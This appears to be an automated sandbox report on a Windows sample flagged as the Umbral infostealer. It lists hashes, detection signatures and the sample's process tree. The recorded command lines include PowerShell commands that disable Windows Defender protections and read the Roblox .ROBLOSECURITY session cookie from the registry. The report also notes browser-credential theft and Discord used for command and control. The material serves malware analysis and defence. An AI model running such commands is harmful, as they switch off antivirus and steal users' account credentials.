Analysis
-
max time kernel
24s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
16-08-2024 12:54
Behavioral task
behavioral1
Sample
7bc86d2e18813d4d06d2d39894762b90N.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
7bc86d2e18813d4d06d2d39894762b90N.exe
Resource
win10v2004-20240802-en
General
-
Target
7bc86d2e18813d4d06d2d39894762b90N.exe
-
Size
229KB
-
MD5
7bc86d2e18813d4d06d2d39894762b90
-
SHA1
6203740dc4dde0290d4827f479f6d08a91a7c699
-
SHA256
70575d18c218295c13e10e6d50b48af76d00f4dd46ed0d5010aaf212b0ea61af
-
SHA512
1918500c3bed431277318d03db3a4d39c0f3a81dcc782aa60d4108e6836593d20aa22d79884e2bb54fd9bc7a63a0dcad8536156437e69f0c020b5e1ad552d685
-
SSDEEP
6144:9loZMhrIkd8g+EtXHkv/iD4jol1t74sz9Krd4UBwwb8e1m1i:foZiL+EP8jol1t74sz9Krd4UBVP
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2744-1-0x0000000000E80000-0x0000000000EC0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 2552 powershell.exe 780 powershell.exe 2796 powershell.exe 2768 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 7bc86d2e18813d4d06d2d39894762b90N.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1732 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2768 powershell.exe 2552 powershell.exe 780 powershell.exe 324 powershell.exe 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2744 7bc86d2e18813d4d06d2d39894762b90N.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 780 powershell.exe Token: SeDebugPrivilege 324 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 wmic.exe Token: SeSecurityPrivilege 1264 wmic.exe Token: SeTakeOwnershipPrivilege 1264 wmic.exe Token: SeLoadDriverPrivilege 1264 wmic.exe Token: SeSystemProfilePrivilege 1264 wmic.exe Token: SeSystemtimePrivilege 1264 wmic.exe Token: SeProfSingleProcessPrivilege 1264 wmic.exe Token: SeIncBasePriorityPrivilege 1264 wmic.exe Token: SeCreatePagefilePrivilege 1264 wmic.exe Token: SeBackupPrivilege 1264 wmic.exe Token: SeRestorePrivilege 1264 wmic.exe Token: SeShutdownPrivilege 1264 wmic.exe Token: SeDebugPrivilege 1264 wmic.exe Token: SeSystemEnvironmentPrivilege 1264 wmic.exe Token: SeRemoteShutdownPrivilege 1264 wmic.exe Token: SeUndockPrivilege 1264 wmic.exe Token: SeManageVolumePrivilege 1264 wmic.exe Token: 33 1264 wmic.exe Token: 34 1264 wmic.exe Token: 35 1264 wmic.exe Token: SeIncreaseQuotaPrivilege 1264 wmic.exe Token: SeSecurityPrivilege 1264 wmic.exe Token: SeTakeOwnershipPrivilege 1264 wmic.exe Token: SeLoadDriverPrivilege 1264 wmic.exe Token: SeSystemProfilePrivilege 1264 wmic.exe Token: SeSystemtimePrivilege 1264 wmic.exe Token: SeProfSingleProcessPrivilege 1264 wmic.exe Token: SeIncBasePriorityPrivilege 1264 wmic.exe Token: SeCreatePagefilePrivilege 1264 wmic.exe Token: SeBackupPrivilege 1264 wmic.exe Token: SeRestorePrivilege 1264 wmic.exe Token: SeShutdownPrivilege 1264 wmic.exe Token: SeDebugPrivilege 1264 wmic.exe Token: SeSystemEnvironmentPrivilege 1264 wmic.exe Token: SeRemoteShutdownPrivilege 1264 wmic.exe Token: SeUndockPrivilege 1264 wmic.exe Token: SeManageVolumePrivilege 1264 wmic.exe Token: 33 1264 wmic.exe Token: 34 1264 wmic.exe Token: 35 1264 wmic.exe Token: SeIncreaseQuotaPrivilege 1976 wmic.exe Token: SeSecurityPrivilege 1976 wmic.exe Token: SeTakeOwnershipPrivilege 1976 wmic.exe Token: SeLoadDriverPrivilege 1976 wmic.exe Token: SeSystemProfilePrivilege 1976 wmic.exe Token: SeSystemtimePrivilege 1976 wmic.exe Token: SeProfSingleProcessPrivilege 1976 wmic.exe Token: SeIncBasePriorityPrivilege 1976 wmic.exe Token: SeCreatePagefilePrivilege 1976 wmic.exe Token: SeBackupPrivilege 1976 wmic.exe Token: SeRestorePrivilege 1976 wmic.exe Token: SeShutdownPrivilege 1976 wmic.exe Token: SeDebugPrivilege 1976 wmic.exe Token: SeSystemEnvironmentPrivilege 1976 wmic.exe Token: SeRemoteShutdownPrivilege 1976 wmic.exe Token: SeUndockPrivilege 1976 wmic.exe Token: SeManageVolumePrivilege 1976 wmic.exe Token: 33 1976 wmic.exe Token: 34 1976 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2744 wrote to memory of 2768 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 30 PID 2744 wrote to memory of 2768 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 30 PID 2744 wrote to memory of 2768 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 30 PID 2744 wrote to memory of 2552 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 32 PID 2744 wrote to memory of 2552 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 32 PID 2744 wrote to memory of 2552 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 32 PID 2744 wrote to memory of 780 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 34 PID 2744 wrote to memory of 780 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 34 PID 2744 wrote to memory of 780 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 34 PID 2744 wrote to memory of 324 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 36 PID 2744 wrote to memory of 324 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 36 PID 2744 wrote to memory of 324 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 36 PID 2744 wrote to memory of 1264 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 38 PID 2744 wrote to memory of 1264 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 38 PID 2744 wrote to memory of 1264 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 38 PID 2744 wrote to memory of 1976 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 41 PID 2744 wrote to memory of 1976 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 41 PID 2744 wrote to memory of 1976 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 41 PID 2744 wrote to memory of 1968 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 43 PID 2744 wrote to memory of 1968 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 43 PID 2744 wrote to memory of 1968 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 43 PID 2744 wrote to memory of 2796 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 45 PID 2744 wrote to memory of 2796 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 45 PID 2744 wrote to memory of 2796 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 45 PID 2744 wrote to memory of 1732 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 47 PID 2744 wrote to memory of 1732 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 47 PID 2744 wrote to memory of 1732 2744 7bc86d2e18813d4d06d2d39894762b90N.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\7bc86d2e18813d4d06d2d39894762b90N.exe"C:\Users\Admin\AppData\Local\Temp\7bc86d2e18813d4d06d2d39894762b90N.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7bc86d2e18813d4d06d2d39894762b90N.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2796
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1732
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TENL1DOXNE5S49EY0PQM.temp
Filesize7KB
MD5c51b15a2575c7569e003f2915e08aed7
SHA10b5d52abe020a3c94a5227543dcdb9332cab00e9
SHA256ab228303c28e74aeb9fe474b826ae4c07910f0d58abf385164093273dafa53c9
SHA51238e0ed86a0ab165b116708bb1beb871f0f234f375da1d96d7bd630989bbb4591effa9cc03e14549c248d1957e7688b05e7aeddadb326302b48eb96ebeb7ca8fa